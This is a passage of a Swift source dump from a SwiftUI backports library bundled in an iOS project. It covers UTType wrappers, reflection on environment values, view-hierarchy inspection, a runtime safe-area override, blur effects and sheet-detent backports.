class `.mimeType`. If not `nil`, the value of this property is the best available MIME type for the given type, according to its declaration. The value of this property is equivalent to, but more efficient than: ``` type.tags[.mimeType]?.first ``` */ public var preferredMIMEType: String? { UTTypeCopyPreferredTagWithClass( identifier as CFString, Backport.UTTagClass.mimeType.rawValue as CFString )?.takeRetainedValue() as? String } /** Whether or not the receiver is a type known to the system. A type cannot be both declared _and_ dynamic. You cannot construct an instance of `UTType` that is neither declared nor dynamic. */ public var isDeclared: Bool { UTTypeIsDeclared(identifier as CFString) } /** Whether or not the receiver is a dynamically generated type. Dynamic types are recognized by the system, but may not be directly declared or claimed by an application. They are used when a file is encountered whose metadata has no corresponding type known to the system. A type cannot be both declared _and_ dynamic. You cannot construct an instance of `UTType` that is neither declared nor dynamic. */ public var isDynamic: Bool { UTTypeIsDynamic(identifier as CFString) } /** The reference URL of the type. A reference URL is a human-readable document describing a type. Most types do not specify reference URLs. - Warning: This URL is not validated in any way by the system, nor is its scheme or structure guaranteed in any way. */ public var referenceURL: URL? { UTTypeCopyDeclaringBundleURL(identifier as CFString)?.takeRetainedValue() as? URL } public var description: String { identifier } public var debugDescription: String { [ "\(identifier) (\(isDynamic ? "dynamic" : "not dynamic")", "\(isDeclared ? "declared" : "not declared"))" ].joined(separator: ",") } public var localizedDescription: String? { UTTypeCopyDescription(identifier as CFString)?.takeRetainedValue() as? String } /** The tag specification dictionary of the type. The system does not store tag information for non-standard tag classes. It normalizes string values into arrays containing those strings. For instance, a value of: ``` { "public.mime-type": "x/y", "nonstandard-tag-class": "abc", } ``` Is normalized to: ``` { "public.mime-type": [ "x/y" ] } ``` If you are simply looking for the preferred filename extension or MIME type of a type, it is more efficient for you to use the `preferredFilenameExtension` and `preferredMIMEType` properties respectively. */ public var tags: [Backport.UTTagClass: [String]] { let params = UTTypeCopyDeclaration(identifier as CFString)?.takeRetainedValue() as? [CFString: Any] let spec = params?[kUTTypeTagSpecificationKey] as? [String: Any] let mimeTypes = spec?[Backport.UTTagClass.mimeType.rawValue] as? [String] ?? [] let extensions = spec?[Backport.UTTagClass.filenameExtension.rawValue] as? [String] ?? [] return [.mimeType: mimeTypes, .filenameExtension: extensions] } public var supertypes: Set { let params = UTTypeCopyDeclaration(identifier as CFString)?.takeRetainedValue() as? [String: Any] let types = params?[String(kUTTypeConformsToKey)] as? [String] ?? [] return .init(types.compactMap(Self.init)) } /** Create an array of types given a type tag. - Parameters: - tag: The tag, such as a filename extension, for which a set of types is desired. - tagClass: The class of the tag, such as `.filenameExtension`. - supertype: Another type that the resulting types must conform to. If `nil`, no conformance is required. - Returns: An array of types, or the empty array if no such types were available. If no types are known to the system with the specified tag but the inputs were otherwise valid, a dynamic type may be provided. */ public static func types(tag: String, tagClass: Backport.UTTagClass, conformingTo type: Self?) -> [Self] { let identifiers = UTTypeCreateAllIdentifiersForTag( tagClass.rawValue as CFString, tag as CFString, type?.identifier as CFString? )?.takeRetainedValue() as? [String] return identifiers?.compactMap(Self.init) ?? [] } /** Tests for a conformance relationship between the receiver and another type. - Parameters: - type: The type against which conformance should be tested. - Returns: If the two types are equal, returns `true`. If the receiver conforms, directly or indirectly, to `type`, returns `true`. Otherwise, returns `false`. - SeeAlso: isSupertype(of:) - SeeAlso: isSubtype(of:) */ public func conforms(to type: UTType) -> Bool { UTTypeConformsTo( identifier as CFString, type.identifier as CFString ) } /** Tests if the receiver is a supertype of another type. - Parameters: - type: The type against which conformance should be tested. - Returns: If `type` conforms, directly or indirectly, to the receiver and is not equal to it, returns `true`. Otherwise, returns `false`. - SeeAlso: conforms(to:) - SeeAlso: isSubtype(of:) */ public func isSupertype(of type: UTType) -> Bool { type.conforms(to: self) && self != type } /** Tests if the receiver is a subtype of another type. - Parameters: - type: The type against which conformance should be tested. - Returns: If the receiver conforms, directly or indirectly, to `type` and is not equal to it, returns `true`. Otherwise, returns `false`. - SeeAlso: conforms(to:) - SeeAlso: isSupertype(of:) */ public func isSubtype(of type: UTType) -> Bool { conforms(to: type) && self != type } public func hash(into hasher: inout Hasher) { hasher.combine(identifier) } public static func == (lhs: Self, rhs: Self) -> Bool { UTTypeEqual(lhs.identifier as CFString, rhs.identifier as CFString) } } } public extension Backport.UTType { /** Create a type given a type identifier. - Parameters: - identifier: The type identifier. - Returns: A type, or `nil` if the type identifier is not known to the system. */ init?(_ identifier: String) { guard UTTypeIsDeclared(identifier as CFString) else { return nil } self.identifier = identifier } /** Create a type given a MIME type. - Parameters: - mimeType: The MIME type for which a type is desired. - supertype: Another type that the resulting type must conform to. Typically, you would pass `.data`. - Returns: A type. If no types are known to the system with the specified MIME type and conformance but the inputs were otherwise valid, a dynamic type may be provided. If the inputs were not valid, returns `nil`. This method is equivalent to: ``` UTType(tag: mimeType, tagClass: .mimeType, conformingTo: supertype) ``` */ init?(mimeType: String, conformingTo type: Self) { guard let identifier = UTTypeCreatePreferredIdentifierForTag( Backport.UTTagClass.mimeType.rawValue as CFString, mimeType as CFString, type.identifier as CFString )?.takeRetainedValue() as? String else { return nil } self.identifier = identifier } /** Create a type given a filename extension. - Parameters: - filenameExtension: The filename extension for which a type is desired. - supertype: Another type that the resulting type must conform to. Typically, you would pass `.data` or `.package`. - Returns: A type. If no types are known to the system with the specified filename extension and conformance but the inputs were otherwise valid, a dynamic type may be provided. If the inputs were not valid, returns `nil`. This method is equivalent to: ``` UTType(tag: filenameExtension, tagClass: .filenameExtension, conformingTo: supertype) ``` To get the type of a file on disk, use `URLResourceValues.contentType`. You should not attempt to derive the type of a file system object based solely on its filename extension. */ init?(filenameExtension: String, conformingTo type: Self) { guard let identifier = UTTypeCreatePreferredIdentifierForTag( Backport.UTTagClass.filenameExtension.rawValue as CFString, filenameExtension as CFString, type.identifier as CFString )?.takeRetainedValue() as? String else { return nil } self.identifier = identifier } /** Create a type given a type tag. - Parameters: - tag: The tag, such as a filename extension, for which a type is desired. - tagClass: The class of the tag, such as `.filenameExtension`. - supertype: Another type that the resulting type must conform to. If `nil`, no conformance is required. - Returns: A type. If no types are known to the system with the specified tag but the inputs were otherwise valid, a dynamic type may be provided. If the inputs were not valid, returns `nil`. */ init?(tag: String, tagClass: Backport.UTTagClass, conformingTo type: Self?) { guard let identifier = UTTypeCreatePreferredIdentifierForTag( tagClass.rawValue as CFString, tag as CFString, type?.identifier as CFString? )?.takeRetainedValue() as? String else { return nil } self.identifier = identifier } /** Gets an active `UTType` corresponding to a type that is declared as "exported" by the current process. - Parameters: - identifier: The type identifier for which a type is desired. - parentType: A parent type that the resulting type is expected to conform to. If `nil`, conformance to either `.data` or `.package` is assumed. - Returns: A type. Use this method to get types that are exported by your application. If `identifier` does not correspond to any type known to the system, the result is undefined. You would generally use this method by assigning its value to a `static let` constant in an extension of `UTType`: ``` extension UTType { static let myFileFormat = UTType(exportedAs: "com.example.myfileformat") } ``` */ init(exportedAs identifier: String, conformingTo type: Self? = nil) { if let decl = UTTypeCopyDeclaration(identifier as CFString)?.takeRetainedValue() as? [String: Any], let identifier = decl[String(kUTTypeIdentifierKey)] as? String { let plist = Bundle.main.infoDictionary?[String(kUTExportedTypeDeclarationsKey)] as? [[String: Any]] let isRegistered = plist .flatMap { $0 }? .compactMap { $0[String(kUTTypeIdentifierKey)] as? String } .contains { $0 == identifier } ?? false if isRegistered { self.identifier = identifier } else { assertionFailure(UTTypeError.expectedExport(identifier).localizedDescription) self.identifier = "" } } else { assertionFailure(UTTypeError.exportMissing(identifier).localizedDescription) self.identifier = "" } } /** Gets an active `UTType` corresponding to a type that is declared as "imported" by the current process. - Parameters: - identifier: The type identifier for which a type is desired. - parentType: A parent type that the resulting type is expected to conform to. If `nil`, conformance to either `.data` or `.package` is assumed. - Returns: A type whose identifier may or may not be equal to `identifier`, but which is functionally equivalent. Use this method to get types that are imported by your application. If `identifier` does not correspond to any type known to the system, the result is undefined. You would generally use this method in the body of a `static` computed property in an extension of `UTType` as the type can change over time: ``` extension UTType { static var competitorFileFormat: UTType { UTType(importedAs: "com.example.competitorfileformat") } } ``` In the general case, this method returns a type with the same identifier, but if that type has a preferred filename extension and _another_ type is the preferred type for that extension, then that _other_ type is substituted. */ init(importedAs identifier: String, conformingTo type: Self? = nil) { if let decl = UTTypeCopyDeclaration(identifier as CFString)?.takeRetainedValue() as? [String: Any], let identifier = decl[String(kUTTypeIdentifierKey)] as? String { let plist = Bundle.main.infoDictionary?[String(kUTImportedTypeDeclarationsKey)] as? [[String: Any]] let isRegistered = plist .flatMap { $0 }? .compactMap { $0[String(kUTTypeIdentifierKey)] as? String } .contains { $0 == identifier } ?? false if isRegistered { self.identifier = identifier } else { assertionFailure(UTTypeError.expectedImport(identifier).localizedDescription) self.identifier = "" } } else { assertionFailure(UTTypeError.importMissing(identifier).localizedDescription) self.identifier = "" } } } private enum UTTypeError: LocalizedError { case importMissing(String) case exportMissing(String) case expectedImport(String) case expectedExport(String) var errorDescription: String? { switch self { case let .importMissing(identifier): return "Type \"\(identifier)\" was expected to be declared and imported in Info.plist, but it was not found." case let .exportMissing(identifier): return "Type \"\(identifier)\" was expected to be declared and exported in Info.plist, but it was not found." case let .expectedImport(identifier): return "Type \"\(identifier)\" was expected to be imported in Info.plist, but it was exported instead." case let .expectedExport(identifier): return "Type \"\(identifier)\" was expected to be exported in Info.plist, but it was imported instead." } } } ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/Environment+String.swift ================================================ import SwiftUI // private extension EnvironmentValues { func containsValue(forKey key: String) -> Bool { return value(forKey: key) != nil } func value(forKey key: String, from mirror: Mirror, as: T.Type) -> T? { // Found a match if let value = mirror.descendant("value", "some") { if let typedValue = value as? T { print("Found value") return typedValue } else { print("Value for key '\(key)' in the environment is of type '\(type(of: value))', but we expected '\(String(describing: T.self))'.") } } else { print("Found key '\(key)' in the environment, but it doesn't have the expected structure. The type hierarchy may have changed in your SwiftUI version.") } return nil } /// Extracts a value from the environment by the name of its associated EnvironmentKey. /// Can be used to grab private environment values such as foregroundColor ("ForegroundColorKey"). func value(forKey key: String, as: T.Type) -> T? { if let mirror = value(forKey: key) as? Mirror { return value(forKey: key, from: mirror, as: T.self) } else if let value = value(forKey: key) as? T { return value } else { return nil } } func value(forKey key: String) -> Any? { func keyFromTypeName(typeName: String) -> String? { let expectedPrefix = "TypedElement>` /// TypedElement.value contains the value of the key. func extract(startingAt environmentNode: Any) -> Any? { let mirror = Mirror(reflecting: environmentNode) let typeName = String(describing: type(of: environmentNode)) if let nodeKey = keyFromTypeName(typeName: typeName) { if key == nodeKey { return mirror } } // Environment values are stored in a doubly linked list. The "before" and "after" keys point // to the next environment member. if let linkedListMirror = mirror.superclassMirror, let nextNode = linkedListMirror.descendant("after", "some") { return extract(startingAt: nextNode) } return nil } let mirror = Mirror(reflecting: self) if let firstEnvironmentValue = mirror.descendant("_plist", "elements", "some") { if let node = extract(startingAt: firstEnvironmentValue) { return node } else { return nil } } else { return nil } } } @propertyWrapper internal struct StringlyTypedEnvironment { final class Store: ObservableObject { var value: Value? = nil } @Environment(\.self) private var env @ObservedObject private var store = Store() var key: String init(key: String) { self.key = key } private(set) var wrappedValue: Value? { get { store.value } nonmutating set { store.value = newValue } } } extension StringlyTypedEnvironment: DynamicProperty { func update() { wrappedValue = env.value(forKey: key, as: Value.self) } } @propertyWrapper internal struct EnvironmentContains: DynamicProperty { final class Store: ObservableObject { var contains: Bool = false } @Environment(\.self) private var env var key: String @ObservedObject private var store = Store() init(key: String) { self.key = key } var wrappedValue: Bool { get { store.contains } nonmutating set { store.contains = newValue } } func update() { wrappedValue = env.containsValue(forKey: key) } } ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/Environment.swift ================================================ import SwiftUI // /* The following code is for debugging purposes only! */ #if DEBUG extension EnvironmentValues: CustomDebugStringConvertible { public var debugDescription: String { "\(self)" .trimmingCharacters(in: .init(["[", "]"])) .replacingOccurrences(of: "EnvironmentPropertyKey", with: "") .replacingOccurrences(of: ", ", with: "\n") } } struct EnvironmentOutputModifier: ViewModifier { @Environment(\.self) private var environment func body(content: Content) -> some View { content } } extension View { func printEnvironment() -> some View { modifier(EnvironmentOutputModifier()) } } #endif ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/Inspect.swift ================================================ import SwiftUI // #if os(iOS) || os(macOS) internal extension PlatformViewController { func ancestor(ofType type: ControllerType.Type) -> ControllerType? { var controller = parent while let c = controller { if let typed = c as? ControllerType { return typed } controller = c.parent } return nil } func sibling(ofType type: ControllerType.Type) -> ControllerType? { guard let controller = parent, let index = controller.children.firstIndex(of: self) else { return nil } var children = controller.children children.remove(at: index) for c in children.reversed() { if let typed = c as? ControllerType { return typed } else if let typed = c.descendent(ofType: type) { return typed } } return nil } func descendent(ofType type: ControllerType.Type) -> ControllerType? { for c in children { if let typed = c as? ControllerType { return typed } else if let typed = c.descendent(ofType: type) { return typed } } return nil } } internal extension PlatformView { func ancestor(ofType type: ViewType.Type) -> ViewType? { var view = superview while let s = view { if let typed = s as? ViewType { return typed } view = s.superview } return nil } func sibling(ofType type: ViewType.Type) -> ViewType? { guard let superview = superview, let index = superview.subviews.firstIndex(of: self) else { return nil } var views = superview.subviews views.remove(at: index) for subview in views.reversed() { if let typed = subview as? ViewType { return typed } else if let typed = subview.descendent(ofType: type) { return typed } } return nil } func descendent(ofType type: ViewType.Type) -> ViewType? { for subview in subviews { if let typed = subview as? ViewType { return typed } else if let typed = subview.descendent(ofType: type) { return typed } } return nil } var host: PlatformView? { var view = superview while let s = view { if NSStringFromClass(type(of: s)).contains("ViewHost") { return s } view = s.superview } return nil } } internal struct Inspector { var hostView: PlatformView var sourceView: PlatformView var sourceController: PlatformViewController func `any`(ofType: ViewType.Type) -> ViewType? { ancestor(ofType: ViewType.self) ?? sibling(ofType: ViewType.self) ?? descendent(ofType: ViewType.self) } func ancestor(ofType: ViewType.Type) -> ViewType? { hostView.ancestor(ofType: ViewType.self) } func sibling(ofType: ViewType.Type) -> ViewType? { hostView.sibling(ofType: ViewType.self) } func descendent(ofType: ViewType.Type) -> ViewType? { hostView.descendent(ofType: ViewType.self) } func `any`(ofType: ControllerType.Type) -> ControllerType? { ancestor(ofType: ControllerType.self) ?? sibling(ofType: ControllerType.self) ?? descendent(ofType: ControllerType.self) } func ancestor(ofType: ControllerType.Type) -> ControllerType? { sourceController.ancestor(ofType: ControllerType.self) } func sibling(ofType: ControllerType.Type) -> ControllerType? { sourceController.sibling(ofType: ControllerType.self) } func descendent(ofType: ControllerType.Type) -> ControllerType? { sourceController.descendent(ofType: ControllerType.self) } } internal struct Proxy { let inspector: Inspector let instance: T } extension View { private func inject(_ wrapped: Wrapped) -> some View where Wrapped: View { overlay(wrapped.frame(width: 0, height: 0)) } func `any`(forType type: T.Type, body: @escaping (Proxy) -> Void) -> some View { inject(InspectionView { inspector in inspector.any(ofType: T.self) } customize: { proxy in body(proxy) }) } func ancestor(forType type: T.Type, body: @escaping (Proxy) -> Void) -> some View { inject(InspectionView { inspector in inspector.ancestor(ofType: T.self) } customize: { proxy in body(proxy) }) } func sibling(forType type: T.Type, body: @escaping (Proxy) -> Void) -> some View { inject(InspectionView { inspector in inspector.sibling(ofType: T.self) } customize: { proxy in body(proxy) }) } func descendent(forType type: T.Type, body: @escaping (Proxy) -> Void) -> some View { inject(InspectionView { inspector in inspector.descendent(ofType: T.self) } customize: { proxy in body(proxy) }) } func `any`(forType type: T.Type, body: @escaping (Proxy) -> Void) -> some View { inject(InspectionView { inspector in inspector.any(ofType: T.self) } customize: { proxy in body(proxy) }) } func ancestor(forType type: T.Type, body: @escaping (Proxy) -> Void) -> some View { inject(InspectionView { inspector in inspector.ancestor(ofType: T.self) } customize: { proxy in body(proxy) }) } func sibling(forType type: T.Type, body: @escaping (Proxy) -> Void) -> some View { inject(InspectionView { inspector in inspector.sibling(ofType: T.self) } customize: { proxy in body(proxy) }) } func descendent(forType type: T.Type, body: @escaping (Proxy) -> Void) -> some View { inject(InspectionView { inspector in inspector.descendent(ofType: T.self) } customize: { proxy in body(proxy) }) } } private struct InspectionView: View { let selector: (Inspector) -> T? let customize: (Proxy) -> Void var body: some View { Representable(parent: self) } } private class SourceView: PlatformView { required init() { super.init(frame: .zero) isHidden = true #if os(iOS) isUserInteractionEnabled = false #endif } @available(*, unavailable) required init?(coder: NSCoder) { fatalError("init(coder:) has not been implemented") } } #endif #if os(iOS) private extension InspectionView { struct Representable: UIViewRepresentable { let parent: InspectionView func makeUIView(context: Context) -> UIView { .init() } func updateUIView(_ view: UIView, context: Context) { DispatchQueue.main.async { guard let host = view.host else { return } let inspector = Inspector( hostView: host, sourceView: view, sourceController: view.parentController ?? view.window?.rootViewController ?? UIViewController() ) guard let target = parent.selector(inspector) else { return } parent.customize(.init(inspector: inspector, instance: target)) } } } } #elseif os(macOS) private extension InspectionView { struct Representable: NSViewRepresentable { let parent: InspectionView func makeNSView(context: Context) -> NSView { .init(frame: .zero) } func updateNSView(_ view: NSView, context: Context) { DispatchQueue.main.async { guard let host = view.host else { return } let inspector = Inspector( hostView: host, sourceView: view, sourceController: view.parentController ?? NSViewController(nibName: nil, bundle: nil) ) guard let target = parent.selector(inspector) else { return } parent.customize(.init(inspector: inspector, instance: target)) } } } } #endif ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/NSItemProvider+Async.swift ================================================ import SwiftUI import CoreServices // public extension NSItemProvider { func loadObject(of type: T.Type) async throws -> T where T: _ObjectiveCBridgeable, T._ObjectiveCType: NSItemProviderReading { try await withCheckedThrowingContinuation { continuation in _ = loadObject(ofClass: T.self) { (value: _ObjectiveCBridgeable?, error: Error?) in switch (value, error) { case let (.some(value as T), nil): continuation.resume(returning: value) case let (_, .some(error)): continuation.resume(throwing: error) return default: return } } } } } extension NSData: NSItemProviderReading { public static var readableTypeIdentifiersForItemProvider: [String] { [String(kUTTypeData)] } public static func object(withItemProviderData data: Data, typeIdentifier: String) throws -> Self { NSData(data: data) as! Self } } ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/OwningController.swift ================================================ // #if os(iOS) import UIKit public extension UIView { var parentController: UIViewController? { if let responder = self.next as? UIViewController { return responder } else if let responder = self.next as? UIView { return responder.parentController } else { return nil } } } #endif #if os(macOS) import AppKit public extension NSView { var parentController: NSViewController? { if let responder = self.nextResponder as? NSViewController { return responder } else if let responder = self.nextResponder as? NSView { return responder.parentController } else { return nil } } } #endif ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/Platforms.swift ================================================ // #if os(iOS) import UIKit public typealias PlatformImage = UIImage public typealias PlatformScreen = UIScreen internal typealias PlatformView = UIView internal typealias PlatformScrollView = UIScrollView internal typealias PlatformViewController = UIViewController extension UIScreen { @nonobjc public static var mainScreen: UIScreen { .main } } extension UIImage { public var png: Data? { pngData() } public func jpg(quality: CGFloat) -> Data? { jpegData(compressionQuality: quality) } } extension CGContext { internal static var current: CGContext? { UIGraphicsGetCurrentContext() } } #elseif os(macOS) import AppKit public typealias PlatformImage = NSImage public typealias PlatformScreen = NSScreen internal typealias PlatformView = NSView internal typealias PlatformScrollView = NSScrollView internal typealias PlatformViewController = NSViewController extension NSScreen { public static var mainScreen: NSScreen { NSScreen.main! } public var scale: CGFloat { backingScaleFactor } } extension NSImage { public var png: Data? { return NSBitmapImageRep(data: tiffRepresentation!)?.representation(using: .png, properties: [:]) } public func jpg(quality: CGFloat) -> Data? { return NSBitmapImageRep(data: tiffRepresentation!)?.representation(using: .jpeg, properties: [.compressionFactor: quality]) } } extension CGContext { internal static var current: CGContext? { NSGraphicsContext.current?.cgContext } } #endif ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/SafeArea.swift ================================================ import SwiftUI // #if os(iOS) || os(tvOS) /* Since UICollectionView is not designed to support SwiftUI out of the box, we need to use a little trick to get the SwiftUI View's to ignore safeArea insets, otherwise our cell's will not always layout correctly. */ internal extension UIHostingController { convenience init(rootView: Content, ignoreSafeArea: Bool) { self.init(rootView: rootView) if ignoreSafeArea { disableSafeArea() } } func disableSafeArea() { guard let viewClass = object_getClass(view) else { return } let viewSubclassName = String(cString: class_getName(viewClass)).appending("_IgnoreSafeArea") if let viewSubclass = NSClassFromString(viewSubclassName) { object_setClass(view, viewSubclass) } else { guard let viewClassNameUtf8 = (viewSubclassName as NSString).utf8String else { return } guard let viewSubclass = objc_allocateClassPair(viewClass, viewClassNameUtf8, 0) else { return } if let method = class_getInstanceMethod(UIView.self, #selector(getter: UIView.safeAreaInsets)) { let safeAreaInsets: @convention(block) (AnyObject) -> UIEdgeInsets = { _ in return .zero } class_addMethod(viewSubclass, #selector(getter: UIView.safeAreaInsets), imp_implementationWithBlock(safeAreaInsets), method_getTypeEncoding(method)) } objc_registerClassPair(viewSubclass) object_setClass(view, viewSubclass) } } } #endif ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/String+LocalizationKey.swift ================================================ import SwiftUI // extension String { internal init?(_ stringKey: LocalizedStringKey) { guard let key = Mirror(reflecting: stringKey).children .first(where: { $0.label == "key" })?.value as? String else { return nil } self = NSLocalizedString(key, comment: "") } } ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/UIScene.swift ================================================ // #if os(iOS) import UIKit internal extension UIApplication { static var activeScene: UIWindowScene? { shared.connectedScenes .first { $0.activationState == .foregroundActive } as? UIWindowScene } } #endif ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/VisualEffects/VisualEffect+iOS.swift ================================================ import SwiftUI #if os(iOS) internal struct VisualEffectBlur: View { /// Defaults to .systemMaterial var blurStyle: UIBlurEffect.Style /// Defaults to nil var vibrancyStyle: UIVibrancyEffectStyle? var content: Content public init(blurStyle: UIBlurEffect.Style = .systemMaterial, vibrancyStyle: UIVibrancyEffectStyle? = nil, @ViewBuilder content: () -> Content) { self.blurStyle = blurStyle self.vibrancyStyle = vibrancyStyle self.content = content() } public var body: some View { Representable(blurStyle: blurStyle, vibrancyStyle: vibrancyStyle, content: content) .accessibility(hidden: Content.self == EmptyView.self) } } private extension VisualEffectBlur { struct Representable: UIViewRepresentable { var blurStyle: UIBlurEffect.Style var vibrancyStyle: UIVibrancyEffectStyle? var content: Content func makeUIView(context: Context) -> UIVisualEffectView { context.coordinator.blurView } func updateUIView(_ view: UIVisualEffectView, context: Context) { context.coordinator.update(content: content, blurStyle: blurStyle, vibrancyStyle: vibrancyStyle) } func makeCoordinator() -> Coordinator { Coordinator(content: content) } } } private extension VisualEffectBlur.Representable { class Coordinator { let blurView = UIVisualEffectView() let vibrancyView = UIVisualEffectView() let hostingController: UIHostingController init(content: Content) { hostingController = UIHostingController(rootView: content) hostingController.view.autoresizingMask = [.flexibleWidth, .flexibleHeight] hostingController.view.backgroundColor = nil blurView.contentView.addSubview(vibrancyView) blurView.autoresizingMask = [.flexibleWidth, .flexibleHeight] vibrancyView.contentView.addSubview(hostingController.view) vibrancyView.autoresizingMask = [.flexibleWidth, .flexibleHeight] } func update(content: Content, blurStyle: UIBlurEffect.Style, vibrancyStyle: UIVibrancyEffectStyle?) { hostingController.rootView = content let blurEffect = UIBlurEffect(style: blurStyle) blurView.effect = blurEffect if let vibrancyStyle = vibrancyStyle { vibrancyView.effect = UIVibrancyEffect(blurEffect: blurEffect, style: vibrancyStyle) } else { vibrancyView.effect = nil } hostingController.view.setNeedsDisplay() } } } extension VisualEffectBlur where Content == EmptyView { init(blurStyle: UIBlurEffect.Style = .systemMaterial) { self.init(blurStyle: blurStyle, vibrancyStyle: nil) { EmptyView() } } } #endif ================================================ FILE: usprebooter/External/SwiftUIBackports/Internal/VisualEffects/VisualEffect+macOS.swift ================================================ import SwiftUI #if os(macOS) internal struct VisualEffectBlur: View { private var material: NSVisualEffectView.Material private var blendingMode: NSVisualEffectView.BlendingMode private var state: NSVisualEffectView.State public init( material: NSVisualEffectView.Material = .headerView, blendingMode: NSVisualEffectView.BlendingMode = .withinWindow, state: NSVisualEffectView.State = .followsWindowActiveState ) { self.material = material self.blendingMode = blendingMode self.state = state } public var body: some View { Representable( material: material, blendingMode: blendingMode, state: state ).accessibility(hidden: true) } } // MARK: - Representable private extension VisualEffectBlur { struct Representable: NSViewRepresentable { var material: NSVisualEffectView.Material var blendingMode: NSVisualEffectView.BlendingMode var state: NSVisualEffectView.State func makeNSView(context: Context) -> NSVisualEffectView { context.coordinator.visualEffectView } func updateNSView(_ view: NSVisualEffectView, context: Context) { context.coordinator.update(material: material) context.coordinator.update(blendingMode: blendingMode) context.coordinator.update(state: state) } func makeCoordinator() -> Coordinator { Coordinator() } } class Coordinator { let visualEffectView = NSVisualEffectView() init() { visualEffectView.blendingMode = .withinWindow } func update(material: NSVisualEffectView.Material) { visualEffectView.material = material } func update(blendingMode: NSVisualEffectView.BlendingMode) { visualEffectView.blendingMode = blendingMode } func update(state: NSVisualEffectView.State) { visualEffectView.state = state } } } #endif ================================================ FILE: usprebooter/External/SwiftUIBackports/UIBackport.swift ================================================ import SwiftUI //@_exported public extension View { /// Wraps a SwiftUI `View` that can be extended to provide backport functionality. var backport: Backport { .init(self) } } public extension AnyTransition { /// Wraps an `AnyTransition` that can be extended to provide backport functionality. static var backport: Backport{ Backport(.identity) } } ================================================ FILE: usprebooter/External/SwiftUIBackports/iOS/Presentation/Detents.swift ================================================ import SwiftUI @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) public extension Backport where Wrapped: View { /// Sets the available detents for the enclosing sheet. /// /// By default, sheets support the ``PresentationDetent/large`` detent. /// /// struct ContentView: View { /// @State private var showSettings = false /// /// var body: some View { /// Button("View Settings") { /// showSettings = true /// } /// .sheet(isPresented: $showSettings) { /// SettingsView() /// .presentationDetents([.medium, .large]) /// } /// } /// } /// /// - Parameter detents: A set of supported detents for the sheet. /// If you provide more than one detent, people can drag the sheet /// to resize it. @ViewBuilder @available(iOS, introduced: 15, deprecated: 16, message: "Presentation detents are only supported in iOS 15+") func presentationDetents(_ detents: Set.PresentationDetent>) -> some View { #if os(iOS) wrapped.background(Backport.Representable(detents: detents, selection: nil)) #else wrapped #endif } /// Sets the available detents for the enclosing sheet, giving you /// programmatic control of the currently selected detent. /// /// By default, sheets support the ``PresentationDetent/large`` detent. /// /// struct ContentView: View { /// @State private var showSettings = false /// @State private var settingsDetent = PresentationDetent.medium /// /// var body: some View { /// Button("View Settings") { /// showSettings = true /// } /// .sheet(isPresented: $showSettings) { /// SettingsView() /// .presentationDetents:( /// [.medium, .large], /// selection: $settingsDetent /// ) /// } /// } /// } /// /// - Parameters: /// - detents: A set of supported detents for the sheet. /// If you provide more that one detent, people can drag the sheet /// to resize it. /// - selection: A ``Binding`` to the currently selected detent. /// Ensure that the value matches one of the detents that you /// provide for the `detents` parameter. @ViewBuilder @available(iOS, introduced: 15, deprecated: 16, message: "Presentation detents are only supported in iOS 15+") func presentationDetents(_ detents: Set.PresentationDetent>, selection: Binding.PresentationDetent>) -> some View { #if os(iOS) wrapped.background(Backport.Representable(detents: detents, selection: selection)) #else wrapped #endif } } @available(iOS, deprecated: 16) @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) public extension Backport { /// A type that represents a height where a sheet naturally rests. struct PresentationDetent: Hashable, Comparable { public struct Identifier: RawRepresentable, Hashable { public var rawValue: String public init(rawValue: String) { self.rawValue = rawValue } public static var medium: Identifier { .init(rawValue: "com.apple.UIKit.medium") } public static var large: Identifier { .init(rawValue: "com.apple.UIKit.large") } } public let id: Identifier /// The system detent for a sheet that's approximately half the height of /// the screen, and is inactive in compact height. public static var medium: PresentationDetent { .init(id: .medium) } /// The system detent for a sheet at full height. public static var large: PresentationDetent { .init(id: .large) } fileprivate static var none: PresentationDetent { return .init(id: .init(rawValue: "")) } public static func < (lhs: PresentationDetent, rhs: PresentationDetent) -> Bool { switch (lhs, rhs) { case (.large, .medium): return false default: return true } } } } #if os(iOS) @available(iOS 15, *) private extension Backport { struct Representable: UIViewControllerRepresentable { let detents: Set.PresentationDetent> let selection: Binding.PresentationDetent>? func makeUIViewController(context: Context) -> Backport.Representable.Controller { Controller(detents: detents, selection: selection) } func updateUIViewController(_ controller: Backport.Representable.Controller, context: Context) { controller.update(detents: detents, selection: selection) } } } @available(iOS 15, *) private extension Backport.Representable { final class Controller: UIViewController, UISheetPresentationControllerDelegate { var detents: Set.PresentationDetent> var selection: Binding.PresentationDetent>? var largestUndimmed: Backport.PresentationDetent? weak var _delegate: UISheetPresentationControllerDelegate? init(detents: Set.PresentationDetent>, selection: Binding.PresentationDetent>?) { self.detents = detents self.selection = selection super.init(nibName: nil, bundle: nil) } required init?(coder: NSCoder) { fatalError("init(coder:) has not been implemented") } override func willMove(toParent parent: UIViewController?) { super.willMove(toParent: parent) if let controller = parent?.sheetPresentationController { if controller.delegate !== self && _delegate == nil { _delegate = controller.delegate controller.delegate = self } } update(detents: detents, selection: selection) } override func willTransition(to newCollection: UITraitCollection, with coordinator: UIViewControllerTransitionCoordinator) { super.willTransition(to: newCollection, with: coordinator) update(detents: detents, selection: selection) } func update(detents: Set.PresentationDetent>, selection: Binding.PresentationDetent>?) { self.detents = detents self.selection = selection if let controller = parent?.sheetPresentationController { controller.animateChanges { controller.detents = detents.sorted().map { switch $0 { case .medium: return .medium() default: return .large() } } if let selection = selection { controller.selectedDetentIdentifier = .init(selection.wrappedValue.id.rawValue) } controller.prefersScrollingExpandsWhenScrolledToEdge = true } UIView.animate(withDuration: 0.25) { if let undimmed = controller.largestUndimmedDetentIdentifier { controller.presentingViewController.view?.tintAdjustmentMode = (selection?.wrappedValue ?? .large) >= .init(id: .init(rawValue: undimmed.rawValue)) ? .automatic : .normal } else { controller.presentingViewController.view?.tintAdjustmentMode = .automatic } } } } func sheetPresentationControllerDidChangeSelectedDetentIdentifier(_ sheetPresentationController: 